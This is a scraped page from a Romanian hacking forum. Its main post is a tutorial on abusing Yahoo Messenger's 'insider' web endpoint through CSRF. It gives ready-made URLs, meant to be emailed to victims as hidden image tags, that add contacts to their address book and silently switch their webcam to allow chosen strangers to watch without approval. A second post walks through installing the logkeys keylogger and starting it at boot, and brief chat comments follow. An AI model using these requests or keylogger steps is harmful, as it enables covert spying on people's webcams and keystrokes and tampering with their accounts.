Leaderboard

Continut: 1) Prezentare 2) Accesarea addressbook-ului 3) Accesarea webcamului fara aprobare 1) Prezentare Toti ati auzit de yahoo insider. Cei mai multi merg pe ideea ca e panarama aia de fereastra care o inchizi cand deschizi mess-ul. Yahoo insider reprezinta insa accesul web la intreg motorasul messengerului. Prin intermediul lui poti accesa diverse setari ale contului, ale yahoo-ului in format XML. Poti accesa address book-ul. Poti lista chat-rooms-urile. In anumite cazuri poti face si setari. Bineinteles ca pentru a putea accesa trebuie sa fii logat. Am facut insa un test simplu si se pare ca cererile le poti face atat prin link direct cat si prin <IMG SRC>. Cu ce ajuta? Inseamna ca pot oricand trimite pe email unui user sub forma unei false fotografii un CSRF care ii va schimba anumite setari. Nu trimiteti link-urile pe messenger. Persoana respectiva poate sa nu fie logata pe browser. Puteti insa trimite un astfel de link trecand printr-un redirect de login in yahoo. Insiderul se acceseaza folosind link-ul: http://insider.msg.yahoo.com/ycontent/?parametri Lista de parametri (incompleta insa) extrasa din yahoo messenger (am dat copy-paste cum am gasit. %s inseamna ca primeste un sir, %d un numar). &langpacks=%slangpacks &slot=%dslottest &ads=%sads &notifications=%snotifications &reliablemessaging=%s &emoticonorder=%semoticonorder &emoticon=%semoticons &av=%sav &imscanners=%simscanners &settings=%ssettings &userfeedback=%suserfeedback &modules=%s &defaultplugin=%s &safeobjects=%s &revokedplugin=%s &sidepanel=%s &contenttab=%s &voicesmiley=%svoicesmiley &partner=%spartner &marketing=%smarketing &logos=%slogos &dct2=%s &dct1=%s &getgp=%sgameprowler &audiblemenu=%saudiblerevoked &getwc=%s &chatcat=%s &games=%s &sms=%s &searchbar=%ssearchbar &url=%surls &system=%ssystem &imv=%simvironments &filter=%s &defaultcountry=1 &countries=%s Exemple: fmt=format. Ofera suplimentar numele feed-ului, nu stiu exact cu ce se mai ocupa dar l-am lasat in coada. http://insider.msg.yahoo.com/ycontent/&fmt=2 Observatie: <content time="1266943437"></content> 1266943437 reprezinta numarul de secunde care au trecut de la data 01/01/1970 00:00:00 GMT (ora 2 in RO). Interesant pentru alte cereri, gen addessbook care ofera data la care ai facut un update. Informatii despre chatrooms: http://insider.msg.yahoo.com/ycontent/?chatcat&fmt=2 http://insider.msg.yahoo.com/ycontent/?chatroom_1000&fmt=2 Setarile de webcam: http://insider.msg.yahoo.com/ycontent/?&getwc=0&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US Addressbook: http://insider.msg.yahoo.com/ycontent/?ab2=1&intl=us&os=win%22&fmt=2 Ca fapt divers sa ne uitam la <farm id="458"/> Amintindu-mi de yahoo cookie generator, ID-ul (458 in acest caz) apare in subcookie-ul Td.SL (sled ID). SL decodat din base64 este de forma 458[0x01]123456789. Lista tarilor si a codurilor telefonice: http://insider.msg.yahoo.com/ycontent/?countries System: http://insider.msg.yahoo.com/ycontent/?system&fmt=2 Imvironments: http://insider.msg.yahoo.com/ycontent/?imv Sms: http://insider.msg.yahoo.com/ycontent/?sms=0 etc... Va mai jucati voi. Atentie insa, presupun ca e posibil sa va dereglati setarile asa ca nu lucrati pe contul de zi cu zi (mi-am stricat eu ceva si nu stiu cum) Acum sa trecem la partea fierbinte: Link-urile de mai jos cum am spus functioneaza atat timp cat persoana este logata in browser. Asta inseamna ca ori deschideti o sesiune in mail, ori trimiteti link-ul la o victima. Cazul 2 sub forma html cu <img src="link"> 2) Accesarea addressbook-ului Sa ne introducem in addressbook: http://insider.msg.yahoo.com/ycontent/?addab=0&fname=Gigel&lname=Coaiegrele&yid=pulamea@yahoo.com&nname=pulamea fname=first name lname=last name yid=yahoo id nname=nickname Verificati addressbook-ul pe http://insider.msg.yahoo.com/ycontent/?ab&fmt=2 http://insider.msg.yahoo.com/ycontent/?ab2&fmt=2 Odata introdus nu va apare imediat in addressbook in yahoo messenger. Dar va apare la refresh in mail->contacts Nu prea inseamna mult dar sa ajungem la partea si mai frumoasa: 3) Accesarea webcamului fara aprobare Intrebarea existentiala CUM SA VEDEM WEBCAMUL FARA PERMISIUNE Raspuns: setam messengerul: messenger->preferences->webcam broadcast bifam allow everyone. Sau bifam always allow the following people to view my webcam si adaugam contul dorit. Cu alte cuvinte: http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=1&chat_access=1&ignore_view=0&intl=us img_quality=[1-10]. 1=viteza 10=calitate. viewer_access=[0-2] 0 - default: cere voie 1 - lasa pe toata lumea 2 - da voie numai la cei din lista chat_access=[0-1] lasa toti userii din chat sa vada camera sau nu. Asta da pwn la labar! Daca suntem baieti mai "sufletisti" hai sa ne bagam numai noi in lista de persoane autorizate: http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=2&chat_access=0&ignore_view=1&friends=pulete1@yahoo.com,pulete2@yahoo.com&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US friends=lista de useri acceptati, cu randurile despartite de virgula ignore_view=[0-1] ignora alte cereri de la cei care nu sunt in lista Pentru verificarea setarilor facute apelati getwc: http://insider.msg.yahoo.com/ycontent/?getwc=1 Bineinteles ca victima va vedea cati useri il privesc, aici depinde de prostia victimei si de norocul vostru. Sper sa gasesc mai multe sa pot continua!

Logkeys este un keylogger pentru calculatoarele cu GNU/Linux, publicat sub licenta GPL3 si WTFPL. Voi descrie procedeul de instalare pe un sistem cu Ubuntu si utilizarea acestuia sumar. Fisiere necesare: http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz (pentru cei care nu folosesc Ubuntu, este posibil sa aveti nevoie de dumpkeys, g++, ps si grep) Instalare: Aflandu-va in directorul care contine fisierul logkeys-0.1.1a.tar.gz, extrageti arhiva: tar xvzf logkeys-0.1.1a.tar.gz Apoi intrati in folderul bild: cd logkeys-0.1.1a/build Apoi compilati: ../configure make Si in final: sudo su //aici cere parola userului curent) make install Scriptul de pornire a daemonului este bin/llk (fisierul real fiind etc/logkeys-start.sh) si cel de oprire este bin/llkk (etc/logkeys-kill.sh). In caz ca vreti sa le configurati dupa plac veti avea nevoie de drepturi de root. Log-ul default este /var/log/logkeys.log Modul manual de folosire: logkeys --start --output <fisier> logkeys --kill (daca fisierul nu exista deja, va trebui sa scrieti "touch <file>") Pornirea o data cu calculatorul adaugati linia de mai jos in fisierul /etc/rc.local logkeys --start --output=<file> Pentru mai multe informatii "man logkeys" sau http://code.google.com/p/logkeys/ Va multumesc pentru atentie si astept intrebari/critici/etc.

@bubu28 Ramase 6

Si ce? Eu daca vreau sa vorbesc cu cineva, pe langa adresa mea de mail, le zic sa ma caute pe un canal de IRC la o anumita ora cu nicknameul X. Lasa-i pe fratele tau si pe ceilalti ratati in universul lor mic si limitat. Oricum, IM-ul e o prostie. Ca sa vorbesc cu cineva, depind de ora la care intra el. Poate atunci am treaba. Deci prefer mailul.

At finaly, sumthin' usefull. -1 () Daca nu iti vine mail-ul de confirmare , cred ca ai 2 optiuni: 1.Astepti sa vina 2.Iti faci alt cont... Url de confirmare arata cam asa, daca te ajuta cumva... http://188.211.234.70/cosmotopup/register-password/code/2213412dsadasdas1ee1sd